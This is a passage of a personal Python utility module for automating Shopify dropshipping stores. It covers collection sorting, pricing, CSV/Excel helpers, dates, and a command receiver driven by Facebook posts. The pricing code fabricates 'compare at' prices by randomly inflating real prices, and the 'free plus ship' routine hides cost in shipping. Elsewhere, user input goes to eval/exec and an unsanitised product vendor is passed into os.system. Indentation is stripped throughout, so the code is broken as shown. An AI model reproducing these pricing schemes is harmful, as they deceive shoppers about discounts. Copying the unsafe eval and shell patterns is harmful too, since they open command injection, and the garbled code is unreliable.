dd.pop("e")
assert "e" not in dd.keys()
assert list(sorted(dd.items())) == [("a", {"a": {"a": "a"}}), ("b", {"a": {"a": {"a": "a"}}}), ("c", {"a": {"a": {"a": "a"}}})]
assert "".join(sorted(str(list(dd.values())))) == " '''''''''''''''''''''',,::::::::[]aaaaaaaaaaa{{{{{{{{}}}}}}}}"
assert list(sorted(dd.keys())) == [ 'a', 'b', 'c']
assert dd.get("a") == {'a': {'a': 'a'}}
assert dd.copy() == AD(dd)
dd.get("a")
dd.get("a", 1)
assert tryreturn(dd.get, "d") == 0
dd.clear()
assert dd == {}
redprint("tests successful")
d = {"a": {"a": [{"a": "a"}]}}
dd = AD(d)
assert "AD" in str(type(dd.a.a[0]))
def items(self):
d = []
for k,v in super().items():
#print("items:_ v: %s" % v)
if "values" in dir(v):
d.append((k, AD(v)))
else:
d.append((k, v))
        # Note: this wraps only top-level dict values; non-dict values (such as lists of dictionaries) are left untouched here.
return d
def get(self, *args):
try: return self[args[0]]
except:
if len(args) == 2:
return args[1]
else:
return self[args[0]]
class Aomoji(AD):
def __repr__(self):
return "{}".format(self.f)
def __init__(self):
super().__init__()
self.a = "(⌐■_■)"
self.b = "[̲̅$̲̅(̲̅ ͡° ͜ʖ ͡°̲̅)̲̅$̲̅]"
self.c = "( ・∀・)・・・--------☆"
self.d = "٩(◕‿◕)۶"
self.e = "ᶘ ᵒᴥᵒᶅ"
self.f = "Ƹ̵̡Ӝ̵̨̄Ʒ"
self.cat = "🐈"
self.hamster = "🐹"
self.fox = "🦊"
self.panda = "🐼"
self.bear = "🐻"
self.frog = "🐸"
self.bee = "🐝"
self.mosquito = "🦟"
self.cricket = "🦗"
self.spider = "🕷"
self.turtle = "🐢"
self.octopus = "🐙"
self.squid = "🦑"
self.whale = "🐳"
self.shark = "🦈"
self.alligator = "🐊"
self.rat = "🐀"
self.squirrel = "🐿"
class B_Colors:
builtin_input = input
builtin_print = print
bprint = builtin_print
def print(*args, **kwargs):
globals()["printed"] = [] if "printed" not in globals() else globals()["printed"]
globals()["printed"].append(" ".join([str(i) for i in args]))
args = list(args)
#args.insert(0, "[%s] "%datetime.now())
args = tuple(args)
builtin_print(*args, **kwargs)
if "colored" not in globals():
from termcolor import colored
setitem(globals(),"colored",colored)
redprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "red"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "red", attrs=kwargs["attrs"]))], sys.stdout.flush()]
greenprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "green"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "green", attrs=kwargs["attrs"]))], sys.stdout.flush()]
yellowprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "yellow"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "yellow", attrs=kwargs["attrs"]))], sys.stdout.flush()]
blueprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "blue"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "blue", attrs=kwargs["attrs"]))], sys.stdout.flush()]
magentaprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "magenta"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "magenta", attrs=kwargs["attrs"]))], sys.stdout.flush()]
cyanprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "cyan"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "cyan", attrs=kwargs["attrs"]))], sys.stdout.flush()]
whiteprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "white"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "white", attrs=kwargs["attrs"]))], sys.stdout.flush()]
redinput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "red"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "red", attrs=kwargs["attrs"]))][-1]
greeninput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "green"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "green", attrs=kwargs["attrs"]))][-1]
yellowinput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "yellow"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "yellow", attrs=kwargs["attrs"]))][-1]
blueinput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "blue"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "blue", attrs=kwargs["attrs"]))][-1]
magentainput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "magenta"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "magenta", attrs=kwargs["attrs"]))][-1]
cyaninput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "cyan"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "cyan", attrs=kwargs["attrs"]))][-1]
whiteinput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "white"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "white", attrs=kwargs["attrs"]))][-1]
def distinct_print(*args, **kwargs):
distinct_print_dict = {1:redprint, 2: greenprint, 3: yellowprint, 4: blueprint, 5: magentaprint, 6: cyanprint, 7: whiteprint}
while True:
if "DISTINCT_PRINT_COUNTER" not in globals().keys():
globals()["DISTINCT_PRINT_COUNTER"] = random.randrange(1, 8)
distinct_print_dict[globals()["DISTINCT_PRINT_COUNTER"]](*args, **kwargs)
break
else:
x = random.randrange(1, 8)
if x == globals()["DISTINCT_PRINT_COUNTER"]:
continue
else:
distinct_print_dict[x](*args, **kwargs)
globals()["DISTINCT_PRINT_COUNTER"] = x
break
def dprint(*args, **kwargs):
distinct_print_dict = {1:redprint, 2: greenprint, 3: yellowprint, 4: blueprint, 5: magentaprint, 6: cyanprint, 7: whiteprint}
while True:
if "DISTINCT_PRINT_COUNTER" not in globals().keys():
globals()["DISTINCT_PRINT_COUNTER"] = random.randrange(1, 8)
distinct_print_dict[globals()["DISTINCT_PRINT_COUNTER"]](*args, **kwargs)
break
else:
x = random.randrange(1, 8)
if x == globals()["DISTINCT_PRINT_COUNTER"]:
continue
else:
distinct_print_dict[x](*args, **kwargs)
globals()["DISTINCT_PRINT_COUNTER"] = x
break
def drkprint(*args, **kwargs):
from colored import fg, bg
args = ", ".join(lmap(str,args))
x = "%s%s" % (fg(255), bg(0))
#x = "%s" % (fg(random.randrange(1,256)))
builtin_print("%s%s" % (x, args))
def rprint(*args, **kwargs):
from colored import fg, bg
args = ", ".join(args)
#x = "%s %s" % (fg(random.randrange(1,256)), bg(random.randrange(1,256)))
x = "%s" % (fg(random.randrange(1,256)))
builtin_print("%s%s" % (x, args))
def random_input(*args, **kwargs):
from colored import fg, bg
args = ", ".join(args)
#x = "%s %s" % (fg(random.randrange(1,256)), bg(random.randrange(1,256)))
x = "%s" % (fg(random.randrange(1,256)))
builtin_input("%s %s" % (x, args))
def distinct_input(*args, **kwargs):
distinct_input_dict = {1:redinput, 2: greeninput, 3: yellowinput, 4: blueinput, 5: magentainput, 6: cyaninput, 7: whiteinput}
while True:
if "DISTINCT_INPUT_COUNTER" not in globals().keys():
globals()["DISTINCT_INPUT_COUNTER"] = random.randrange(1, 8)
distinct_input_dict[globals()["DISTINCT_INPUT_COUNTER"]](*args, **kwargs)
break
else:
x = random.randrange(1, 8)
if x == globals()["DISTINCT_INPUT_COUNTER"]:
continue
else:
distinct_input_dict[x](*args, **kwargs)
globals()["DISTINCT_INPUT_COUNTER"] = x
break
globals().update(locals())
class DecisionTree(object):
def init(self):
if hasattr(self, 'functions_sorted'):
self.functions = [getattr(self, i) for i in self.functions_sorted]
return
self.functions = []
for i in dir(self):
v = getattr(self, i)
from types import MethodType,ModuleType,FunctionType
if type(v) is MethodType and '__' not in i and i not in ['exec', 'show', 'run', 'init']:
self.functions.append(i)
self.functions = sorted(self.functions)
self.functions = [getattr(self, i) for i in self.functions]
def exec(self, command):
command = eval(command)
for i in dir(self):
try: locals().update(getattr(self,i).__globals__)
except: pass
for i in sorted(locals()):
print(i)
import pyperclip
pyperclip.copy(command)
exec(command)
def show(self):
print('\n'*2)
print('='*42)
for idx, i in zip([i for i in range(1000) if i <= 12 or i >= 14], self.functions, ):
if i.__name__ != "<lambda>": print("%s. %s"%(idx, i.__name__))
else: print("%s. %s"%(idx, get_lambda_name(i)))
def run(self):
self.init()
while True:
try:
self.show()
now_what = input("\nNow what?\n: ")
if now_what == 'q':
print("QUITTING")
return
args = now_what
if args[:4] == 'exec':
self.exec(args[4:])
continue
args = now_what.split(' ')
func_idx = int(args.pop(0))
func = dict(zip([i for i in range(1000) if i <= 12 or i >= 14], self.functions, ))[func_idx]
if len(args) == 0:
call = func.__call__()
elif len(args) > 0:
call = func.__call__(*args)
if call != None:
return call
except Exception as e:
print("There was an error: %s"%e)
class CH:
def __call__(self, p, shop=None):
shop = or_list(lambda:Shop()(Get(Product,id=p.id).shop),lambda:Shop()(shop))
collection = None
if(0==len([i for i in apilimitcall(lambda:shop.shopify.CustomCollection.find(title=p.product_type)) if i.title==p.product_type])):
(shop.shopify.CustomCollection(dict(OrderedDict([ ["title",p.product_type], ["body_html", ""], ["image",{"src":p.image.src, "alt":p.product_type }], ["published",True], ["sort_order","manual"], ["published_scope","global"], ]))).save())
collection = (apilimitcall(lambda:[i for i in shop.shopify.CustomCollection.find(title=p.product_type) if i.title == p.product_type][0]))
else:
collection = (apilimitcall(lambda:[i for i in shop.shopify.CustomCollection.find(title=p.product_type) if i.title == p.product_type][0]))
apilimitcall(lambda:shop.shopify.Collect({"position":0,"collection_id":collection.id,"product_id":p.id,}).save())
def mcc(self, shop, title):
shop = Shop()(shop)
collection = [(CH().mcc(shop.shop_abbreviation,title))if(False==(shop.shopify.CustomCollection(dict(OrderedDict([ ["title",title], ["body_html", ""], ["image",None], ["published",True], ["sort_order","manual"], ["published_scope","global"], ]))).save()))else(),(shop.shopify.CustomCollection.find(title=title)[0])][1]if(0==len([i for i in shop.shopify.CustomCollection.find(title=title) if i.title==title]))else(shop.shopify.CustomCollection.find(title=title)[0])
def create_collect(self,shop,product=None,handle=None,position=None,):
product=shop.shopify.Product.find(handle=handle)[0]if(product==None)else(product)
try:
0/shop.shopify.Collect({
"collection_id":shop.shopify.CustomCollection.find(title=product.product_type)[0].id ,
"position":min([max([len(shop.shopify.CustomCollection.find(title=product.product_type)[0].products())/2,len(shop.shopify.CustomCollection.find(title=product.product_type)[0].products())]),30]) if(None==position)else(position),
"product_id":product.id ,
}).save()
except Exception as e:
redprint(e)
redprint("MAJOR ERROR: COLLECT NOT SAVING... CHECK FOR IF THIS OCCURS")
def remove(self,product,product_type):
shop = Shop()(product.shop)
product = product.p()
l = shop.shopify.CustomCollection.find(title=Get(Product,id=product.id).product_type)
l = [i for i in l if i.title == product_type][0]
product.product_type = product_type
product.save()
l.remove_product(product)
CH()(product)
Update(Get(Product,id=product.id),product_type=product_type)
def whole_collection_resort(self,shop):
if type(shop) == str:shop = Shop()(shop)
products = getshopifyproducts(shop.shop_abbreviation)
product_types = sorted(set(key("product_type",products)))
collections = shop.shopify.CustomCollection.find(status="any",limit=250)
for i in product_types:
product_type = i
print(product_type)
collection_ = [i for i in collections if i.title == product_type]
print(collection_)
try:
collection_ = collection_[0]
except:
print("could not find one")
continue
products_ = [i for i in products if i.product_type == product_type]
coll_prods = shop.pfind(collection_id=collection_.id,limit=250)
for j in products_:
if j not in coll_prods:
product_to_add = j
# collection_.add_product(product_to_add)
CH()(product_to_add,shop.shop_abbreviation)
print("adding one product %s to %s"%(j.product_type,product_type))
time.sleep(0.5)
coll_prods = shop.pfind(collection_id=collection_.id,limit=250)
for j in coll_prods:
if j.product_type != product_type:
product_to_remove = j
collection_.remove_product(product_to_remove)
print("removing one product %s from %s"%(j.product_type,product_type))
time.sleep(0.5)
total_product_count = 0
for i in collections:
coll_prods = shop.pfind(collection_id=i.id,limit=250)
total_product_count = total_product_count + len(coll_prods)
assert len(set(sud("product_type",coll_prods))) == 1
assert list(set(sud("product_type",coll_prods)))[0] == i.title
len_products = len([j for j in products if j.product_type == i.title])
assert len_products == len(coll_prods)
print("%s products for %s, %s in collection"%(len_products,i.title,len(coll_prods)))
assert total_product_count == len(products)
print("%s total product count for %s products"%(total_product_count,len(products)))
def assign_plus_size_tags(self):
for i in All(Product):
L=set(flatten(keymulti(["option1","option2","option3"],i.variants),1))
if "3XL" in L:
print(L)
i.product_tags = add_tag(i.product_tags,"Plus Size")
print(i.product_tags)
i.save()
Q=Shop()(i.shop).pfind(id_=i.id)
Q.tags=i.product_tags
Q.save()
def get_compare_at_price(self,new_price):
multiplier = 0.01 * random.randrange(150, 220)
compare_at_price = multiplier * new_price
compare_at_price = int(compare_at_price)
compare_at_price = compare_at_price - 0.05
return compare_at_price
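    # Worked example (my annotation, not from the original source):
    """
    new_price = 20; multiplier drawn from 1.50-2.19 -> int(30.0 .. 43.8) - 0.05 -> 29.95 .. 42.95
    """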
def free_plus_ship(self,product_id):
        product = product_id if type(product_id) == Product else Product.objects.get(id=product_id)
        shop = Shop()(product.shop)
        product = apilimitcall(lambda:shop.shopify.Product.find(id_=product.id))
for variant in product.variants:
price = float(variant.price)
import math
variant.grams = math.ceil(price/10) * 100
variant.weight = 0.1
variant.compare_at_price = ((variant.weight*10)*9.95) * (random.randrange(14,18)/10)
variant.price = 0.00
redprint("variant weight: %s" % variant.weight)
redprint("variant compare_at_price: %s" % variant.compare_at_price)
redprint("variant price: %s" % variant.price)
print("")
varsave(product)
def adjust_weights(self,shop):
try: shop = Shop()(shop)
except: pass
products = getshopifyproducts(shop)
for i in products:
for j in i.variants:
weight_unit = "kg"
weight = None
price = None
price = float(j.price)
weight = float(j.weight)
if j.weight_unit == "kg" and price != 0.0 and weight == 0:
None
else:
if price == 0.0:
weight = 0.1
else:
weight = 0.0
j.weight = weight
j.price = price
j.weight_unit = weight_unit
j.save()
print("[%s][%s][%s][%s][%s]"%(j.weight_unit, j.weight, j.price, j.title, i.id))
time.sleep(0.5)
def price_change(self,old_price,shop):
old_price = round(old_price,2)
if "%s_price_list"%(shop) in key("w",All(ExecutableText)):
price_list = ExecutableText().export("%s_price_list"%(shop))
if old_price not in price_list:
return (int(old_price * 1.7) - 0.05)
else:
return price_list[old_price]
else:
if len(Filter(PriceChange,shop=shop)): return (old_price*2) - 0.05
x = PriceChange().price_change(old_price,shop)
return x
        return
        # NOTE: everything below is unreachable legacy pricing tiers (both branches above already return); kept for reference only.
        new_price = 0
if 0 <= old_price < 5:
new_price = old_price + 10
elif 5 <= old_price < 10:
new_price = old_price + 8
elif 10 <= old_price < 15:
new_price = old_price * 2
elif 15 <= old_price < 20:
new_price = old_price * 2
elif 20 <= old_price < 40:
new_price = old_price * 2
elif 40 <= old_price < 60:
new_price = old_price * 1.8
elif 60 <= old_price < 80:
new_price = old_price * 1.65
elif 80 <= old_price < 100:
new_price = old_price * 1.6
elif 100 <= old_price < 1000:
new_price = old_price * 1.59
new_price = int(new_price)
new_price = new_price - 0.05
print("old price: %s, new price: %s" % (old_price, new_price))
if new_price <= 14 and new_price >= 10 and old_price <= 7:
new_price = 9.95
return new_price
def reset_weight_on_priced_product(self,product):
if type(product) is Product:
product = Shop()(product.shop).shopify.Product.find(id_=product.id)
changed = False
for v in product.variants:
if float(v.price) != 0 and float(v.weight) != 0:
v.weight = 0
changed = True
distinct_print("[reset_weight_on_priced_product][changed = True] [%s]"%product.id)
if float(v.price) == 0 and float(v.weight) == 0:
os.system("touch ~/%s_v_price_and_v_weight==0____vendor_%s"%(product.id,product.vendor))
if changed == True: product.save()
class Chatter:
def get_texts(self):
thoughts = (thought for i in range(500))
for i in thoughts:
if talking_about_programming_for_timeframe_until_february_7th_2019(i):
dont_talk()
class CommandReceiver:
def __init__(self):
# 'email = CommandEmail()()\nemailer = Emailer().set_services_initiate_2(email.email)\nmsgs = emailer.set_messages(10)\nx = sudby(lambda i:"UNREAD" in i.labelIds,filter(msgs,subject="command",sender=email.receiving_email))\nnew = x[-1]\ncommand,data="twirl1",SOUP(new.hidden_message_3.decode()).text\ncommands = {"twirl1":lambda x:([setattr(g,"Z",x.strip()),pool(lambda:tp(lambda:Product().add_product(caption=x.split("\\n")[1],url=x.split("\\n")[0]),ep=1))])}\ncommands[command](data)\n'
posts = get_feed()
commands = {
"postit":lambda x:([setattr(g,"Z","twirl1: caption"),pool(lambda:tp(lambda:Product().add_product(post_caption=x.split("\n",1)[1],url=x.split("\n")[0]),ep=1))]),
"changeshop":lambda x:Update(Muta()(),store_abbre=x.split(",")[0],page=x.split(",")[1])
}
posts = sudby(lambda i:str(i.get("message")).split("\n")[0] in commands.keys(),tcer(posts))
lmap(lambda i:tp(lambda:FacebookNewsFeedPosts().add(created_time=Date().parse_date(i["created_time"],localize_timezone=True),message=i["message"])),posts)
if not Filter(FacebookNewsFeedPosts,posted=0): return
new = list(Filter(FacebookNewsFeedPosts,posted=0))[0]
command,data = new.message.split("\n")[0],new.message.split("\n",1)[1]
commands[command](data)
Update(list(Filter(FacebookNewsFeedPosts,posted=0))[0],posted=1)
class CSV(DecisionTree):
exec("from csv import *")
def ListWrite(self,fn,data,delimiter=",",newline="\n"):
with open(fn,'w',newline=newline) as f:
f=csv.writer(f,delimiter=delimiter)
f.writerows(data)
def ListRead(self,fn,delimiter=","):
with open(fn,'r') as f:
data=list(csv.reader(f,delimiter=delimiter))
return data
def DictRead(self, fn, fields=None, delimiter='\t',encoding='utf8',errors='ignore'):
import codecs
if not fields:
with open(fn,'r',encoding=encoding,errors=errors) as f:
try: fields = list(csv.reader(f,delimiter=delimiter))[0]
except: fields = list(csv.DictReader(codecs.open(fn, 'rU', 'utf-16', errors=errors), dialect='excel', delimiter=delimiter))[0]
with open(fn,'r',encoding=encoding,errors=errors) as f:
try: pay = list(csv.DictReader(f,delimiter=delimiter))
except: pay = list(csv.DictReader(codecs.open(fn, 'rU', 'utf-16', errors=errors), dialect='excel', delimiter=delimiter))
pay= pay if not fields else \
[{a:b for a,b in _dict.items() if a in fields} for _dict in pay]
return pay
def DictReadWithDelimiterGuess(self, fn, fields=None,encoding='utf8',errors='ignore'):
A=flatten(lmap(list,keycall("values",CSV().DictRead(fn,delimiter="\t",encoding=encoding,errors=errors))),1)
B=flatten(lmap(list,keycall("values",CSV().DictRead(fn,delimiter=",",encoding=encoding,errors=errors))),1)
delimiter = 0
if len(B)>=len(A):
delimiter = ","
else:
delimiter = "\t"
return CSV().DictRead(fn, fields=fields, delimiter = delimiter)
def DictWriteWithHeaders(self, fn, _dictlist, headers, delimiter='\t'):
with open(fn, 'w', newline='\n') as csvfile:
writer = csv.writer(csvfile, delimiter=delimiter)
writer.writerow(headers)
for row in _dictlist:
targetrow = []
for key in headers:
try:targetrow.append(row[key])
except:targetrow.append(getattr(row, key))
writer.writerow(targetrow)
def DictWrite(self, fn, _dictlist, delimiter = '\t'):
with open(fn, 'w') as f:
import csv
f=csv.DictWriter(f = f, fieldnames=_dictlist[0].keys(), delimiter=delimiter)
f.writeheader()
f.writerows(_dictlist)
def DictAppend(self, fn, _dictlist, delimiter = '\t'):
with open(fn, 'a') as f:
import csv
f=csv.DictWriter(f = f, fieldnames=_dictlist[0].keys(), delimiter=delimiter)
f.writeheader()
f.writerows(_dictlist)
def pick_data(self, data, fields, returntype="OrderedDict"):
payload = []
for i in data:
d = OrderedDict() if returntype == "OrderedDict" else AttrDict()
for j in fields:
                try: d[j] = getattr(i, j) # prefer pick_data from an attritem; let plain dicts raise and fall through
except: d[j] = i.get(j, None) # 2ndprefer pick_data from a dictionary
payload.append(d)
return payload
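    # Usage sketch (my example, not from the original source); assumes the AttrDict helper defined elsewhere in this file.
    """
    CSV().pick_data([{"a": 1, "b": 2}], ["a"])            # -> [OrderedDict([("a", 1)])]
    CSV().pick_data([AttrDict({"a": 1, "b": 2})], ["a"])  # -> [OrderedDict([("a", 1)])]
    """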
def transpose_csv(self,fn,delimiter='\t'):
a = zip(*csv.reader(open(fn, "r"),delimiter=delimiter))
csv.writer(open(fn, "w")).writerows(a)
def excel_open(self, fn):
system('/Applications/Microsoft\ Excel_2016.app/Contents/MacOS/Microsoft\ Excel %s &'%os.path.abspath(fn))
def xlsx_to_csv(self, workbook, sheet, as_dict=True):
import csv
import openpyxl
wb = openpyxl.load_workbook(workbook)
ws = wb[sheet]
data = [key("value",i) for i in list(ws.rows)]
if as_dict == False:
return data
if as_dict == True:
dictlist = [AttrDict(dict(zip(data[0],i))) for i in data[1:]]
return dictlist
def dictlist_to_xlsx(self, dictlist, headers, workbook, sheet):
CSV().DictWriteWithHeaders(fn="tmp.csv", _dictlist = dictlist, headers = headers)
CSV().csv_to_xlsx(infile="tmp.csv", workbook=workbook, sheet=sheet, rm_infile = True)
def xlsx_column_to_images(self, workbook, sheet, column):
import openpyxl
column = int(column) # in case this is being run via class DecisionTree
wb = openpyxl.load_workbook(workbook)
ws = wb[sheet]
count_rows = len(list(ws.rows))
for i in range(count_rows):
ws.row_dimensions[i].height = 100
column_letter = list(ws.columns)[column - 1][0].coordinate[0]
print(column_letter)
ws.column_dimensions[column_letter].width = 100
column = list(ws.columns)[column - 1] # Column B -> Column 2 -> list(ws.columns)[1] ; 2->1
for cell in column[1:20]:
value = cell.value
cell.value = "" # Keeping the URL inside widens the row.
cyanprint("value: %s" % value)
if value == None:
continue
if cell.row == 1:
continue
image_path = None
if "https://" in value:
redprint("Downloading %s" % value)
try:image_path = Images().download(value, )
except Exception as e : print("%s,%s"%(image_path,e)); continue
#while os.path.exists(image_path) == False: [redprint("waiting for image"), time.sleep(1)]
else:
redprint("image path = value %s" % value)
image_path = value
if os.path.exists(image_path) == False:
redprint("[Does not exist][%s]"%image_path); continue
img = openpyxl.drawing.image.Image(image_path)
img.height = 100
img.width = 100
ws.add_image(img, cell.coordinate)
#column_letter = cell.coordinate[0]
os.system("rm %s/tmp.jpg &>/dev/null"%os.getcwd())
wb.save(workbook)
def csv_to_xlsx(self, infile, workbook, sheet, rm_infile = False, delimiter="\t"):
print("""[Solved] One limitation of csv_to_xlsx currently is that it fills in x&y based on your infile's data size. if it's overwriting a smaller.""")
import csv
import openpyxl
assert openpyxl.__version__ == "2.5.4"
try:
wb = openpyxl.load_workbook(workbook)
except:
wb = openpyxl.Workbook()
try:
ws = wb[sheet]
except Exception as e:
print(e, "creating sheet")
ws = wb.create_sheet(sheet)
tp(lambda:wb.remove_sheet(wb.get_sheet_by_name("Sheet")))
### first, clear all data so the event of data smaller leaving duplicates does not occur
for i in list(ws.rows):
for j in i:
j.value = None
with open(infile,"r") as f:
data = list(csv.reader(f, delimiter=delimiter))
for idx, i in enumerate(data):
for idx2, j in enumerate(i):
# i think if you make it a thread, the workbook may not save before all threads finish, and there may be overlap
try: ws.cell(row=idx+1, column=idx2+1).value = j
except: ws.cell(row=idx+1, column=idx2+1).value = "ERROR_VALUE"
wb.save(workbook)
if rm_infile:
os.remove(infile)
@staticmethod
def csvprint(data, width=1, colnames=None, spacer="|",print_headers=1,alignleft=True):
import django
if type(data) == django.db.models.query.QuerySet:
data = [OrderedDict([[a,str(getattr(x,a))] for a in list(sorted(x.__dict__.keys())) if not a.startswith("_")]) for x in data]
if len(data) == 0:
redprint("[no data][exitting]")
return
if colnames:
payload = []
for i in data:
tmp = OrderedDict()
for j in colnames:
try: tmp[j] = getattr(i, j)
except: tmp[j] = i[j]
payload.append(tmp)
data = payload
if not colnames:
colnames = data[0].keys()
column_dict = dict(zip(colnames, [i.upper() for i in colnames]))
ifdo(lambda:print_headers,lambda:data.insert(0, column_dict))
text = []
for i in colnames:
max_len = max(listmap(len, listmap(str, key(data, key=i))))
for idx, j in enumerate(data):
try: addition = str(j[i])
except: addition = str(getattr(j, i))
number_of_spaces = max_len - len(addition)
if alignleft:
addition += (spacer*(number_of_spaces+width))
else:
addition = (spacer*(number_of_spaces+width)) + addition
try: text[idx] += addition
except: text.append(addition)
data.pop(0)
if alignleft:
distinct_print('\n'.join([spacer*len(text[-1])+(spacer*width)]+[((spacer*width)+i) for i in text]+[spacer*len(text[-1])+(spacer*width)]))
else:
distinct_print('\n'.join([spacer*len(text[-1])+(spacer*width)]+[(i+(spacer*width)) for i in text]+[spacer*len(text[-1])+(spacer*width)]))
print("")
def get_workbook_sheet_styles(self, workbook_path):
import _pickle
import openpyxl
workbook_sheet_styles = {}
wb = openpyxl.load_workbook(workbook_path)
sheetnames = wb.sheetnames
sheetnames.pop(sheetnames.index("Sheet"))
for sheetname in sheetnames:
ws = wb[sheetname]
columns = list(ws.columns)
column_names = [i[0].value for i in columns]
sheet_styles = {}
for column_name, column in zip(column_names,columns):
sheet_styles[column_name] = {
"fill": _pickle.dumps(copy.copy(column[1].fill)),
"font": _pickle.dumps(copy.copy(column[1].font)),
"width": _pickle.dumps(copy.copy(column[1].parent.column_dimensions[column[1].column].width)),
"alignment": _pickle.dumps(copy.copy(column[1].alignment)),
"border": _pickle.dumps(copy.copy(column[1].border))
}
workbook_sheet_styles[sheetname] = sheet_styles
_pickle.dump(workbook_sheet_styles, open(homepath("~/tavern/tavern/bag/.workbook_sheet_styles.pkl"), "wb"))
return workbook_sheet_styles
def xlsx_filter(self, ws):
import openpyxl
maxcolumnletter = openpyxl.utils.get_column_letter(ws.max_column)
ws.auto_filter.ref = 'A1:'+maxcolumnletter+str(len(ws['A']))
    def xlsx_cell(self, cell, fgColor="000000", font_color="000000", column_width=None, font_size=5, font_name="Calibri", shrink_to_fit=True, vertical="top", border_style="hair", number_format="0.00"):
        import openpyxl
        cell.fill = openpyxl.styles.PatternFill(fgColor=fgColor, fill_type="solid")
        cell.font = openpyxl.styles.Font(size=font_size, name=font_name, color=font_color)
        if column_width != None: cell.parent.column_dimensions[cell.column].width = column_width
        cell.alignment = openpyxl.styles.Alignment(shrink_to_fit=shrink_to_fit, vertical=vertical, horizontal="general", wrap_text=False, indent=0, text_rotation=0)
        cell.border = openpyxl.styles.borders.Border(left=openpyxl.styles.borders.Side(style=border_style), right=openpyxl.styles.borders.Side(style=border_style), top=openpyxl.styles.borders.Side(style=border_style), bottom=openpyxl.styles.borders.Side(style=border_style))
        cell.number_format = number_format
class Date(object):
def __init__(self, _str=None, b=None):
if _str is None: _str = datetime.now()
self.datestr = self.autodate(_str)
self.dateobj = self.autodateobj(_str).replace(tzinfo=None)
self.datetime = datetime
self.now = datetime.now
def myTimedelta(self, years=0, days=0, hours=0, minutes=0, seconds=0, ):
seconds = seconds
seconds = seconds + (minutes*60)
seconds = seconds + (hours*3600)
seconds = seconds + (days*86400)
seconds = seconds + (years*31536000)
seconds = seconds + (86400*len([i for i in list(range(datetime.now().date().year,datetime.now().date().year+29)) if i%4==0]))
return timedelta(seconds=seconds)
def autodate(self, _str):
_str = _str.split(' ')[0] if type(_str) == str and ' ' in _str else _str
try:_str = datetime.strftime(_str,'%Y-%m-%d') if type(_str) != str else _str
except: _str = datetime.strftime(_str.dateobj,'%Y-%m-%d') if type(_str) != str else _str
import re
m,d,Y='06','06','2006'
Ymd = re.findall(r'(....[/:-].*[/:-].*)',_str)
mdY = re.findall(r'(.*[/:-].*[:/-]....)',_str)
if len(Ymd) > 0:
Ymd = re.sub(r'([:/-])','#',Ymd[0])
Y,m,d = Ymd.split('#')
elif len(mdY) > 0:
mdY = re.sub(r'([:/-])','#',mdY[0])
m,d,Y = mdY.split('#')
try:
if len(m) == 1:
m = '0%s' % m
if len(d) == 1:
d = '0%s' % d
except Exception as e:
print(e)
return '-'.join([Y,m,d])
def autodateobj(self, _str):
return datetime.strptime(self.autodate(_str),'%Y-%m-%d')
def strftime(self, srftime_string):
return self.dateobj.strftime(srftime_string)
def __repr__(self):
return self.datestr
def __sub__(self, _str):
if type(_str) == int:
return Date(self.dateobj - timedelta(_str))
else:
return (self.dateobj - Date(_str).dateobj).days
def __add__(self, _str):
if type(_str) == int:
return Date(self.dateobj + timedelta(_str))
def __lt__(self, _str):
return self.dateobj < Date(_str).dateobj
def __gt__(self, _str):
return self.dateobj > Date(_str).dateobj
def __eq__(self, _str):
if tryprocess(lambda:Date(_str)) == 0:
return False
return self.dateobj == Date(_str).dateobj
def __call__(self):
return self.dateobj
def datelist(self, x):
return [Date(datetime.today() - timedelta(i*1)) for i in sorted(range(x),reverse=True)]
def dt(self=None, x=0, strf='%Y-%m-%d'):
return (datetime.now() + timedelta(x)).strftime(strf)
@staticmethod
def myDate():
x = datetime.now()
y = datetime.now().year
d1_of_year = datetime(y, 1, 1)
z = (datetime.today() - d1_of_year).days
return z
@staticmethod
def myDatetimenow(dateobj = None, round_count = 4):
#print("hello, myDatetimenow is running now")
dateobj = datetime.now() if dateobj == None else dateobj.replace(tzinfo=None)
dateobj_year_str = str(dateobj.year)[-2:]
a = int(dateobj_year_str) * 1000
mydatetimenow_inside_the_day = ((dateobj.hour * 60 * 60) + (dateobj.minute*60) + dateobj.second)/(24*60*60)
mydatetimenow_from_yearstart = (dateobj - datetime(dateobj.year-1, 12, 31)).days
mydatetimenow = a + mydatetimenow_inside_the_day + mydatetimenow_from_yearstart
mydatetimenow = round(mydatetimenow, round_count) #
#print("%s->%s"%(dateobj,mydatetimenow))
return mydatetimenow
@staticmethod
def myUndatetimenow(x):
year = int(x/1000) + 2000
datetime_ = datetime(year,1,1)
seconds = (x - int(x)) * (24*60*60)
days = int(x - int(x/1000) * 1000)
